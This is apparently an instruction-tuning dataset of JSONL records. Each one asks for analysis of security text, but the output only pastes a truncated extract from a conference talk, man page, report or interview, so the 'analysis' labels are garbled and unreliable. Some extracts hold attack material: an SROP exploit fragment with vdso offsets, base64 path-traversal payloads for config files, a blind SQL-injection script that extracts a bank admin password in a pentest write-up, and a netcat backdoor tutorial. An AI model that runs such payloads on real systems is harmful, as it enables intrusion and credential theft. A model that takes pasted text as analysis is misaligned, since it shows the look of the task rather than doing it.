#ldd或者ida打开程序 10 #vdso 前几位都大几率是0xf7f 11 #再结合pie最后12位不变 12 #vdso也是只需爆破8位 13 int_80_add = vdso_add + 0xde6 14 sigreturn_add = vdso_add + 0xde1 #mov eax,0x77 int 80 15 int_80_pop3_ret = vdso_add + 0xdc7 16 can_write_add = vdso_add  0x4000 17 i=0 18 19 def send_no_line(str): 20 return link.send(str) 21 22 def stack_overflow(ropchain): 23 payload = 'A' * 0x16 + ropchain 24 payload = payload.ljust(0x400,'A') # 25 send_no_line(payload) 26 return 27 28 def srop(): 29 payload = 3 * 'AAAA' + p32(sigreturn_add) 30 frame1 = SigreturnFrame(kernel='amd64') 31 frame1.eax = constants.SYS_read 32 frame1.ebx = 0 33 frame1.ecx = can_write_add + 0x200 34 frame1.edx = len(shellcode) 35 frame1.eip = int_80_pop3_ret 36 ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nInterview with David MacMichael  February 13, 2006 by Richard Thieme David MacMichael is a former CIA Analyst, US Marine and historian. He was a senior estimates officer with special responsibility for Western Hemisphere Affairs at the CIA's National Intelligence Council from 1981 to 1983. He resigned from the CIA rather than falsify reports for political reasons and testified at the World Court on the illegalities of Iran-Contra. MacMichael started The Association of National Security Alumni, an organization to expose and curtail covert actions, and is a steering committee member of Veteran Intelligence Professionals for Sanity (VIPS). He and Richard Thieme, a frequent contributor to NCR, recently met at an Intelligence Ethics Conference that gathered nearly two hundred professionals from a broad spectrum of perspectives to discuss the impact of a career in intelligence on the moral and ethical life of the intelligence professional. MacMichael discusses his background, ethical issues in intelligence, and the relevance of Iran-Contra to current national security issues. RT: David, we discussed technology and the intelligence community DM: Thats a term I hate! It sounds so warm and fuzzy. RT: What do you prefer? DM: Intelligence system. RT: OK. Technology and the intelligence system. DM: For years I worked at SRI (Stanford Research Institute) and Uri Geller and people like that were always floating through. I was supposed to be a voice of sanity but they did get me thinking about certain things that show up in your piece on technology (MacMichael reviewed my essay, The Changing Context of Intelligence and Ethics: Enabling Technologies as Transformational Engines) and what is happening there in the intelligence community. Jacques Ellul wrote of how technology defines the way the world operates and if it has an evil purpose or one that is wrong by previous standards, it will be used anyway. I was a history professor, and I think of Diderot in the 18th century France. T", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993 The Regents of the University of California. '\\\" Copyright (c) 1994-1996 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: pwd.n,v 1.2 2003/11/24 05:09:59 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClass '", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOverview Key Findings Recommendations Software engineering leaders focused on software engineering strategies should work with their security and risk counterparts to: Licensed for Distribution How Software Engineering Leaders Can Mitigate Software Supply Chain Security Risks Published 15 July 2021 - ID G00752454 - 19 min read By Manjunath Bhat, Dale Gardner, and 1 more Attackers are targeting software development systems, open-source artifacts and DevOps pipelines to compromise software supply chains. Software engineering leaders must guide their teams to protect the integrity of the software delivery process by adopting practices described in this research. The increased threats of malicious code injection makes it critical to protect internal code and external dependencies (both open-source and commercial).  Leaked secrets or other sensitive data and code tampering prior to release are consequences of a compromised software build and delivery pipeline.  Failure to enforce least privilege entitlements and flat network architectures enables attackers to move laterally against the operating environment, putting the enterprise at greater risk.  Protect the integrity of internal and external code by enforcing strong version-control policies, using artifact repositories for trusted content, and managing vendor risk throughout the delivery life cycle.  Harden the software delivery pipeline by configuring security controls in CI/CD tools, securing secrets and signing code and container images.  Secure the operating environment for software engineers by governing access to resources using principles of least privilege and a zero-trust security model.  Strategic Planning Assumption By 2025, 45% of organizations worldwide will have experienced attacks on their software supply chains, a three-fold increase from 2021. Introduction Software engineering leaders are at the forefront of digital business innovation. They are responsible not only for software development and delivery", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n應用密碼學入門 @HITCON CMT 2018 我是誰  Allen Chou  我好像沒什麼值得介紹的  https://allenchou.cc/  GitHub: s3131212  s3131212@gmail.com  FB: s3131212 背景知識 密碼學是什麼  不是研究怎麼設安全的密碼  不是教你怎麼破解別人 Facebook  你不會因為知道密碼學在幹嘛就變成天才駭客  很多數學  我是說真的很多  不過我並沒有打算講很多數學理論  我自己數學也不好 QQ  如果已經沒興趣了可以趕快離開我不會介意 密碼學是什麼  古典密碼學  資料保密傳遞  密碼破譯  現代密碼學  古典密碼學的所有東西  資料完整性驗證Data integrity  資料的不可否認性 Non-repudiation  雜湊函數Hash  亂數  隱寫術Steganography  ... 常見詞彙解釋 1. 加密 Encrypt指將明文經過某種程序轉換成密文該程序稱為加密 2. 解密 Decrypt指將密文經過某種程序轉換成明文該程序稱為解密 3. 明文 Plaintext加密前的訊息 4. 密文 Cipertext加密後的訊息 5. 演算法 Algorithm解決複雜問題的程序 6. 密碼學演算法做與密碼學相關程序如加密解密簽章...的演算法 7. 金鑰 / 密鑰 Key加解密時所使用的鑰匙 加密 & 解密 明文 密文 加密 解密 加密 & 解密 Alice Bob 明文 密文 加密 密文 明文 解密 公開通道 柯克霍夫原則Kerckhoffs's principle  即使演算法完全洩漏只要金鑰沒有洩漏密文就是安全的  Claude Shannon: \"the enemy knows the system\"  Bruce Schneier: 任何以隱藏設計作為防護Security through obscurity的保安 系統必然會失敗  Kerckhoffs's principle 不是說密碼學演算法都必須公開而是要確保即使公開也 不會傷害安全性 古典密碼學 凱薩密碼Caesar cipher  好像每次講密碼學都要從他開始講起 Orz  加密簡單來說就是把字母左右偏移 n 位方向及 n 作為金鑰  解密就...挪回來... By Matt_Crypto http://en.wikipedia.org/wiki/File:Caesar3.png (Public domain) By Cepheus https://commons.wikimedia.org/wiki/File:Caesar3.svg (Public domain) 加密以向左偏三位為例 解密 凱薩密碼Caesar cipher  攻擊暴力破解太簡單也才 26 種可能  據說凱薩當年就是用往左偏移三個字母來加密的  阿不過他的敵人大多不識字  加密向左偏移三格hitcon -> efqzlk  解密向右偏移三格efqzlk -> hitcon 單一字元替代密碼  和凱薩密碼一樣是字母一對一代換但沒有規律  換字表密鑰 a -> h b -> e c -> q d -> k ...  加密dcba -> kqeh  解密kqeh -> dcba  其實也不一定要換成另一個字母e.g. 豬圈密碼 單一字元替代密碼 攻擊字頻分析Frequency analysis 最常出現的字母e, t, a, o, i 最常出現的單字the, to, of, and 自動化分析https://quipqiup.com/ By Nandhp (Public domain) https://commons.wikimedia.org/wiki/File:English_l etter_frequency_(alphabetic).svg 維吉尼亞密碼Vigenère Cipher  基本上就是一系列的凱薩密碼 明文platelet is great 密鑰hitcon重複填補到明文長度 密文wttvsylb bu uelim  字頻分析不能用了 QQ  沒關係還是有方法可以破解 卡西斯基試驗Kasiski examination 密鑰ABCDAB CD ABCDA BCD ABCDABCDABCD 明文CRYPTO IS SHORT FOR CRYPTOGRAPHY 密文CSASTP KV SIQUT GQU CSASTPIUAQJB 相差 16 位 => 密鑰為 16 的因數 Index of coincidence  已知在英文一段有意義的長文中隨機取兩字母相同機率為 0.068  已知同樣明文經同樣的密鑰加密後會出來同樣的密文 C --- key=B ---> D  以重複間格不斷", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n我是谁 姓名董弘琛 ID月白 90后白帽子360网络安全专家擅长渗透测试 代码审计脚本开发等相关安全技能金融行业相 关安全服务经验丰富希望能和各位师傅们交流学 习更多的知识 同时也感谢我的领导团队以及主办方对我的帮助 与支持 先来聊聊代码审计 什么是代码审计 为什么要代码审计 如何进行代码审计 什么是代码审计 检查源代码中的安全缺陷检查程序源代码是否存在 安全隐患或者有编码不规范的地方通过自动化工 具或者人工审查的方式对程序源代码逐条进行检查 和分析发现这些源代码缺陷引发的安全漏洞并提 供代码修订措施和建议 什么是代码审计 就是在代码中寻找安全隐患 什么隐患 如何寻找 为什么代码审计 网络安全风险 白盒测试 代码审计收益 如何代码审计 代码审计的基本流程 确认审计 主体 确认系统使用的语 言框架版本信 息开发文档等等 对系统代码有清晰 的认知 进行审计 挖掘漏洞 结合使用自动化工 具与人工审计高 效而又细致的对系 统进行审计 汇总并提供 修复方案 对审计出的漏洞进 行汇总给出相应 的修复方案并协助 修复 复测或 定期审计 代码并非一成不变 漏洞也一样定期 的代码审计同样重 要 代码审计中的难点 语言繁多组合使用 代码混乱结构复杂 ..\\\\..\\\\..\\\\App\\\\Common\\\\Conf\\\\db.php Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGRiLnBocA== http://127.0.0.1/xyhai.php?s=/Templets/edit/fname/ Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGRiLnBocA== ..\\\\..\\\\..\\\\App\\\\Common\\\\Conf\\\\config.php Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGNvbmZpZy5waHA= http://127.0.0.1/xyhai.php?s=/Templets/edit/fname/ Li5cXC4uXFwuLlxcQXBwXFxDb21tb25cXENvbmZcXGNvbmZpZy5waHA== 金融行业的安全背景 数字化进程的加快 由线下到线上的快速转变 行业监管要求日益严格细化 制度体系进一步完善 金融行业的安全风险 漏洞威胁 攻击威胁 代码本身 黑客攻击频繁漏洞越挖越快零DAY频出 不讲武德网络攻击组织化与全球化 代码产出时便埋下的隐患 金融行业的安全漏洞 SQL注入 SQL注入JDBCHibernateMybatis 跨站脚本 存储型XSS反射型XSS基于DOM的XSS 命令注入 不可信赖的数据导致程序执行恶意命令 HTTP响应截断 不可信赖的数据置于HTTP头文件中发出 密码管理 硬编码密码配置文件中的明文密码弱加密 XML注入 向XML文档中写入未经验证的数据 路径遍历 不可信赖的数据构成路径 XML外部实体注入 对非安全的外部实体数据进行处理 动态代码解析 程序运行时动态解析源代码指令受到攻击 组件漏洞 使用存在漏洞的组件 SQL注入JDBC 拼接 SQL 语句 参数化查询 无效的参数化查询 用户输入 直接作为SQL指令的一部分 先编译带有占位符的SQL语句 将占位符替换为用户输入 SQL注入 Mybatis 在 MyBatis 中使用 XML 文件 或 Annotation 来 进行配置和映射将 interfaces 和 Java POJOs 映射到 database records  简化绝大部分 JDBC 代码手工设置参数和获取结果  灵活使用者能够完全控制 SQL支持高级映射 MyBatis XML Mapper Interface XML 配置文件 #{ } ${ } #{ } ${ } 存在着一些不能直接使用#{ }的情况 ORDER BY LIKE IN 如何避免使用${ }呢 SQL注入Hibernate Hibernate 它使用时只需要操纵对象使开发更对象 化抛弃了数据库中心的思想是完全的面向对象思 想同时拥有简洁的 HQL 编程 敢把我给忘了 HQL 注入 位置参数 命名参数 类实例 路径遍历 组件安全 开源组件带来的安全隐患 组件漏洞 难以排查系统中存在大量的组件版本不一 难以维护部分组件不再更新或者更新缓慢 难以修复部分组件漏洞很难或需要大量时间 精力进行修复 安全组件带来的安全防护 组件分类 组件名称 业务功能安全组件 文件安全上传组件 文件安全下载组件 密码找回组件 分步提交组件 数据脱敏组件 防篡改组件 攻击防护安全组件 防短信炸弹组件 防重放组件 防越权访问组件 组件分类 组件名称 安全工具组件 Cookie保护组件 加密算法组件 Token组件 随机数生", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Interrupt 3 无论何时触发了一个软件中断异常, 异常地址以及EIP寄存器的值都会同时指向产生异常的下一句指令. 但断点异常是其中的一个特例. 当`EXCEPTION_BREAKPOINT(0x80000003)`异常触发时, Windows会认定这是由单字节的\"`CC`\"操作码(也即`Int 3`指令)造成的. Windows递减异常地址以指向所认定的\"`CC`\"操作码, 随后传递该异常给异常处理句柄. 但是EIP寄存器的值并不会发生变化. 因此, 如果使用了 `CD 03`这是 `Int 03` 的机器码表示那么当异常处理句柄接受控制时, 异常地址是指向 `03` 的位置.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJuly 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Max Bazaliy Jailbreaking Apple Watch July 27-30, 2017 whoami 1 2 3 4 5 6 7 8 9 10 11 12 o Security researcher at Lookout o Lead researcher on Pegasus exploit chain o Focused on advanced exploitation techniques o Fried Apple team co-founder o iOS/tvOS/WatchOS jailbreak author July 27-30, 2017 o Released in 2015% o Apple S1/S2%processor o ARMv7k 32 bit architecture o 512 MB RAM o WatchOS 1 2 3 4 5 6 7 8 9 10 11 12 What is Apple Watch ? July 27-30, 2017 o Its fun J o Access to sensitive user data o Run tools like radare or frida on a watch o iPhone attack vector 1 2 3 4 5 6 7 8 9 10 11 12 Why to pwn a watch? July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Apple Watch security o Secure boot chain o Mandatory Code Signing o Sandbox o Exploit Mitigations o Secure Enclave Processor (2-nd generation only) o Data Protection July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Possible attack vectors o Malformed USB descriptor (cable required) o Malformed email, message, photo, etc o Application extension based July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Attack plan o Leak kernel base o Dump whole kernel o Find gadgets and setup primitives o Disable security restrictions o Run ssh client on a watch July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Bugs of interest o CVE-2016-4656%- osunserialize bug o CVE-2016-4669%- mach_port register o CVE-2016-7644%- set_dp_control_port o CVE-2017-2370%- voucher extract recipe July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 Leaking kernel slide o CVE-2016-4655%and CVE-2016-4680% o Object constructor missing bounds checking o OSNumber object with high number of bits o Object length used to copy value from stack o Kernel stack memory leaked o Can be triggered from an apps sandbox July 27-30, 2017 1 2 3 4 5 6 7 8 9 10 11 12 OSObject * OSUnserializeBinary(const char *buffer, size_t bufferSize, OSString **errorString) { uint32_t key, len, wordLen; len = (key & kOSSerializeDataMask); ... case kOSSerializeNumber: bufferPos +=", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nFuzzit: A Mobile Fuzzing Tool Kevin Mahaffey John Hering Anthony Lineberry Flexilis  http://www.flexilis.com Introduction to Fuzzit Fuzzit is a tool designed to find vulnerabilities in mobile devices. It implements a testing technique that most readers will be familiar with called fuzzing. In short, fuzzing aims to trigger software faults by automaticallygenerating and injecting unusual, unexpected, or outofspecification input into a system. Such input typically includes malformed data structures/formats in both expected and unexpected system states. In a fuzzing system, there are four major components that contribute its overall effectiveness: a generation system, a state management system, an injection system, and a result analysis system. As we will discuss below, Fuzzit was written from the ground up to address the problems faced when auditing mobile devices and mobilespecific protocols. Why did we need to write something new? Although currently available fuzzers are fine for most uses, we believe that mobile is a unique enough problem domain that existing tools would require significant changes to address the problems we face in fuzzing mobile devices. We also wanted to share a few fuzzing techniques that we've found to be successful over the years. Fuzzit is built to address the problems with fuzzing mobile devices. Most importantly, the attack surface of a mobile device has significantly more breadth than that of a typical PC or server. We cannot solely focus on protocols that are borne over the TCP/IP, as mobile devices implement additional protocol stacks such as Bluetooth, WAP, and NFC. A mobile fuzzing system must be flexible enough to support not only the generation of data for various protocols and file formats, but also the state management and injection requirements for those protocols and files. Fuzzit is designed with a generic core that performs functionality common to various protocols and file formats. The framework is designed to prefer configur", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAn Introduction to Backdooring Operating Systems Lance Buttars Aka Nemus DC801 www.dc801.org www.introtobackdoors.com - Updated Slides Special Thanks to Natedmac , Metacortex, Grifter, D3c4f and everyone at DC801 Disclaimer  The information provided in this presentation is to be used for educational purposes only.  I am in no way responsible for any misuse of the information provided.  All of the information is to develop a defense attitude in order to provided insight into possibilities.  In no way should you use the information to cause any kind of damage directly or indirectly.  You implement the information given in this presentation at your own risk.  Contact a Lawyer if you have legal questions. What this presentation does NOT cover.  How to hide your backdoor from skilled forensics investigators.  How to clean up any logs or breadcrumbs you will leave behind.  Any legal Issues you may encounter.  This is not the best way to deploy a backdoor, but its good practice in understanding how backdoors work and what you can do with them. Perquisites  Familiarity with Linux command line and bash shell.  Familiarity with networking and firewalls.  Familiarity with windows CMD and command line. Scenario: Target leaves their desk and their computer is unlocked. Guess what? This happens right? So what else could we do? Lets see how fast we can install a back door. Backdooring Windows 7  Lets set up a backdoor on a Windows 7 system using netcat.  For now lets assume the user is logged in with admin privileges. Prep Work  Netcat is not full featured and you will want more capability. To solve this we will create a toolkit of portable applications to:  Download more files or addition software.  Edit files and make changes.  Setup the back door quickly  Execute pranks and control a computer remotely. Put your toolkit on a usb drive or host it on a remote webserver. Portable Applications  Portable applications are applications that have everything they need to run inside there", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nDCFluX in: License to Transmit DCFluX in: License to Transmit Presented By: Matt Krick, DCFluX  K3MK Chief Engineer, New West Broadcasting Systems, Inc. DEFCON 19; Las Vegas, NV Where have all the weirdos gone? --Moxie Marlinspike Hidden Agenda 1. Fuck Your Stupid Smart Phone 2. Amateur Radio 3. Getting Started 0. About the Author 5. General Incompetence 4. Commercial To Amateur Hacks  Matt Krick  DCFluX  Video Editor  Broadcast Engineer  1998 to Present  K3MK  Licensed to Transmit, 1994 to Present 0. About the Author Radio Merit Badge 1. Fuck Your Stupid Smart Phone 1. Fuck Your Stupid Smart Phone 1. Fuck Your Stupid Smart Phone  Phone Patch  Auto Patch Phone Calls 1. Fuck Your Stupid Smart Phone  Frequency Modulation  Amplitude Modulation  Single Side Band  Digital Modulation  Project 25 Push To Talk 1. Fuck Your Stupid Smart Phone  Morse Code  CW  Radio Teletype  RTTY  Baudot  Packet  AX.25  Phase Shift Keying  PSK31 Text Messaging 1. Fuck Your Stupid Smart Phone  SSTV (Slow Scan Television)  Packet Picture Mail 1. Fuck Your Stupid Smart Phone  ATV (Amateur Television)  Amplitude Modulated  Frequency Modulated  D-ATV (Digital Amateur Television)  8-VSB  COFDM  DSS Video Chat 1. Fuck Your Stupid Smart Phone  APRS (Amateur Packet Reporting System) Location Awareness 1. Fuck Your Stupid Smart Phone  Long Range WiFi  902  928 MHz  2.4 GHz (802.11b)  2400  2450 MHz  5.7 GHz (802.11a)  5680  5825 GHz Up to 1500 W PEP (+62 dBm) Internet Access 1. Fuck Your Stupid Smart Phone App Store 1. Fuck Your Stupid Smart Phone No Phone Company Required 1. Fuck Your Stupid Smart Phone Yaesu FT-530 Yaesu FT-530 1. Fuck Your Stupid Smart Phone 1. Fuck Your Stupid Smart Phone Kenwood TH-77A Kenwood TH-77A 1. Fuck Your Stupid Smart Phone 2. Amateur Radio Citizens Band  Amateur Radio Citizens Band  Amateur Radio FluX Makes Things Simple 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio 2. Amateur Radio FRS, GMRS, MURS  Amateur Radio FRS, GMRS, MURS  Amateur Radio FluX ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n环境搭建 1.项目介绍 本次项目模拟渗透测试人员在授权的情况下对目标进行渗透测试从外网打 点到内网横向渗透最终获取整个内网权限本次项目属于三层代理内网穿 透会学习到各种内网穿透技术cobalt strike 在内网中各种横行方法也 会学习到在工具利用失败的情况下手写 exp 获取边界突破点进入内网详细 介绍外网各种打点方法,学习到行业流行的内网渗透测试办法对个人提升很有 帮助 2.VPS 映射 1.将 ip 映射到公网在公网 vps 使用配置 frp 工具的 frps.ini 运行 frps.exe -c frps.ini 在 web1 上配置 frpc.ini 运行 frpc.exe -c frp.ini 成功访问到环境 http://x.x.x.x:8088/login.jsp 信息收集 1.端口探测 使用 nmap 进行端口探测发现 44445003808888998878 端口开放 然后查看其详细信息 2.网站源代码查找 发现有一个网上银行系统使用弱口令和暴力破解没有爆破出弱口令用户 然后就在 github 试试运气发现了源码 源码地址https://github.com/amateur-RD/netBank-System 发现了一个数据库文件有一些普通用户和管理员用户的账户和密码 3.SQL 注入 然后进行登录测试发现存在 sql 注入漏洞 网上银行系统 Hsql 注入漏洞 使用 sqlmap 不能进行跑出用户名和密码 4.编写脚本进行 sql 注入 #coding:utf-8 import requests password=\"\" url=\"http://x.x.x.x:8878/admin/login\" payload=\"0123456789abcdefghijklmnopqrstuvwxyz\" password=\"\" for i in range(1,20): for j in payload: exp = \"admin' and(select substring(password,%s,1) from Admin) like '%s' or '1'='\" %(i,j) print(\"正在注入\") data = {\"admin.username\": exp, \"admin.password\": 'aaaa', \"type\": 1} req = requests.post(url=url, data=data); if \"密码不正确\" in req.text: password+=j break print(password) 成功跑出密码然后进行登录 登录之后寻找文件上传或者可以获取到 webshell 的地方发现没有可利用 点 5.tomexam SQL 注入漏洞 在另一个地址处发现可以注册用户然后注册用户进行登录 登录之后发现某处存在 sql 注入 使用 sqlmap 进行获取用户信息 | 1 | 1 | 1399999999 | 1 | 超级管理员 | admin | admin | 17D03DA6474CE8BEB13B01E79F789E63 | 2022-04-09 00:14:08 | 301 | | 6 | 2 | | 1 | | eu3 | eu3 | 4124DDEBABDF97C2430274823B3184D4 (eu3) | 2014-05-17 13:58:49 | 14 成功抓到了管理员用户和密码然后使用 md5 进行解密 成功进行登录登录之后没有找到可 getshell 的地方 6.Jspxcms-SQL 注入 首页发现可以注册用户和进行登录首先搜索历史漏洞看看有没有 getshell 的地方 发现先知的大佬做过找个版本的代码审计参考链接 https://xz.aliyun.com/t/10891?page=1#toc-7发现可以通过文件上传进行 gethshell 在之前的 tomexam 的数据库中发现存在 jspxcms试试查找一下管理员的用 户和信息 使用 sqlmap 进行查找表用户和吗密码 成功发现了用户名和加密的密码密码推断是明文密码+salt 然后再进行 md5 加密 7.编写解密脚本 通过其源码分析其加密方式然后编写解密脚本 package com.jspxcms.core; import com.jspxcms.common.security.SHA1CredentialsDigest; import com.jspxcms.common.util.Encodes; import java.io.File; import java.io.FileReader; import java.io.FileWriter; import java.io.PrintWr", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"DECLARE\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME DECLARE \\- 定义一个游标 .SH SYNOPSIS .sp .nf DECLARE \\fIname\\fR [ BINARY ] [ INSENSITIVE ] [ [ NO ] SCROLL ] CURSOR [ { WITH | WITHOUT } HOLD ] FOR \\fIquery\\fR [ FOR { READ ONLY | UPDATE [ OF \\fIcolumn\\fR [, ...] ] } ] .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBDECLARE\\fR 允许用户创建游标 用于在一个大的查询里面检索少数几行数据 使用 FETCH [\\fBfetch\\fR(7)]游标可以既可以返回文本也可以返回二进制格式 .PP 通常游标返回文本格式和 SELECT 生成的是一样的 因为数据在系统内部是用二进制格式存储的 系统必须对数据做一定转换以生成文本格式 一旦数据是以文本形式返回那么客户端应用需要把它们转换成二进制进行操作 另外文本格式一般都比对应的二进制格式占的存储空间大 二进制游标给你返回内部二进制形态的数据当然如果你想以文本方式显示数据那么以文本方式检索会为你节约很多客户端的工作 .PP 比如如果查询从一个整数列返回一个一 在缺省的游标里你将获得一个字符串 1而如果是一个二进制游标 你将得到一个 4-字节的包含该数值内部形式的数值大端序 .PP 游标应该小心使用二进制游标一些用户应用如 psql 是不识别二进制游标的 而且期望返回的数据是文本格式 .sp .RS .B \"Note:\" 注意: 如果客户端应用使用\"扩展查询\"协议发出 FETCH 命令 那么 Bind 协议声明数据是用文本还是用二进制格式检索 这个选择覆盖游标的定义因此在使用扩展查询协议的时候二进制游标的概念已经过时了  任何游标都可以当作文本或者二进制的格式发出 .RE .sp .SH \"PARAMETERS 参数\" .TP \\fB\\fIname\\fB\\fR 将在随后FETCH操作中使用的游标名 .TP \\fBBINARY\\fR 令游标以二进制而不是文本格式获取数据 .TP \\fBINSENSITIVE\\fR 表明从游标检索出来的数据不应该被其他进程或游标的更新动作影响 在 PostgreSQL 里所有游标都是不敏感的这个关键字没有什么作用提供它只是为了和 SQL 标准兼容 .TP \\fBSCROLL\\fR .TP \\fBNO SCROLL\\fR SCROLL 声明该游标可以用于以非顺序的方式检索数据行也就是向后检索 根据查询的执行计划的不同声明 SCROLL 可能会对查询的执行时间附加一定的影响 NO SCROLL 声明该游标不能用于以非顺序的方式检索数据行也就是向后检索 .TP \\fBWITH HOLD\\fR .TP \\fBWITHOUT HOLD\\fR WITH HOLD 声明该游标可以在创建它的事务成功提交后继续使用 WITHOUT HOLD 声明该游标不能在创建它的的事务提交后使用如果既没有声明 WITHOUT HOLD也没有声明 WITH HOLD 那么缺省是 WITH HOLD .TP \\fB\\fIquery\\fB\\fR 一个SELECT查询它提供由游标返回的行 请参考 SELECT 语句获取有关有效查询的详细信息 .TP \\fBFOR READ ONLY\\fR .TP \\fBFOR UPDATE\\fR FOR READ ONLY 表明游标将用于只读模式 FOR UPDATE 表明游标将被用于更新表 因为目前 PostgreSQL 不支持游标更新 所以声明 FOR UPDATE 将产生一个错误信息而声明 FOR READ ONLY 没有作用 .TP \\fB\\fIcolumn\\fB\\fR 将被更新的列因为游标更新目前不被 PostgreSQL 支持 所以 FOR UPDATE 子句将产生一个错误信息 .PP BINARYINSENSITIVESCROLL 关键字可以以任何顺序出现 .PP .SH \"NOTES 注意\" .PP 如果没有声明 WITH HOLD那么这个命令创建的游标只能在当前事务中使用 Thus, \\fBDECLARE\\fR without WITH HOLD is useless outside a transaction block: the cursor would survive only to the", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n張善政 S-C (Simon) Chang 行政院副院長 Vice Premier Aug. 26th, 2015 Reinforcing Cyber Security -- Taiwans Roadmap Reinforcing Cyber Security -- Taiwans Roadmap  Build a comprehensive defense posture  Government wide classification and security requirements  Establish 8 CIP domains and security requirements  PPP (public private partnership)  2nd-line security operation center (SOC)  Human resource building  Beyond conventional curriculum  Internship at industry, with credits  A common drill platform and live traffic feeds  International competition supports  Incubate Taiwan signature events  HITCON  Platform of incubation and interaction Reinforcing Cyber Security -- Taiwans Roadmap  Build a comprehensive defense posture  Government wide classification and security requirements  Establish 8 CIP domains and security requirements  PPP (public private partnership)  2nd-line security operation center (SOC)  Human resource building  Beyond conventional curriculum  Internship at industry, with credits  A common drill platform and live traffic feeds  International competition supports  Incubate Taiwan signature events  HITCON  Platform of incubation and interaction Reinforcing Cyber Security -- Taiwans Roadmap  Build a comprehensive defense posture  Government wide classification and security requirements  Establish 8 CIP domains and security requirements  PPP (public private partnership)  2nd-line security operation center (SOC)  Human resource building  Beyond conventional curriculum  Internship at industry, with credits  A common drill platform and live traffic feeds  International competition supports  Incubate Taiwan signature events  HITCON  Platform of incubation and interaction Reinforcing Cyber Security -- Taiwans Roadmap  Build a comprehensive defense posture  Government wide classification and security requirements  Establish 8 CIP domains and security requirements  PPP (public private partnership)  2nd-line security operation center (SOC)  Human resource building  Beyond ", "category": "text_analysis", "source": "security_papers"}
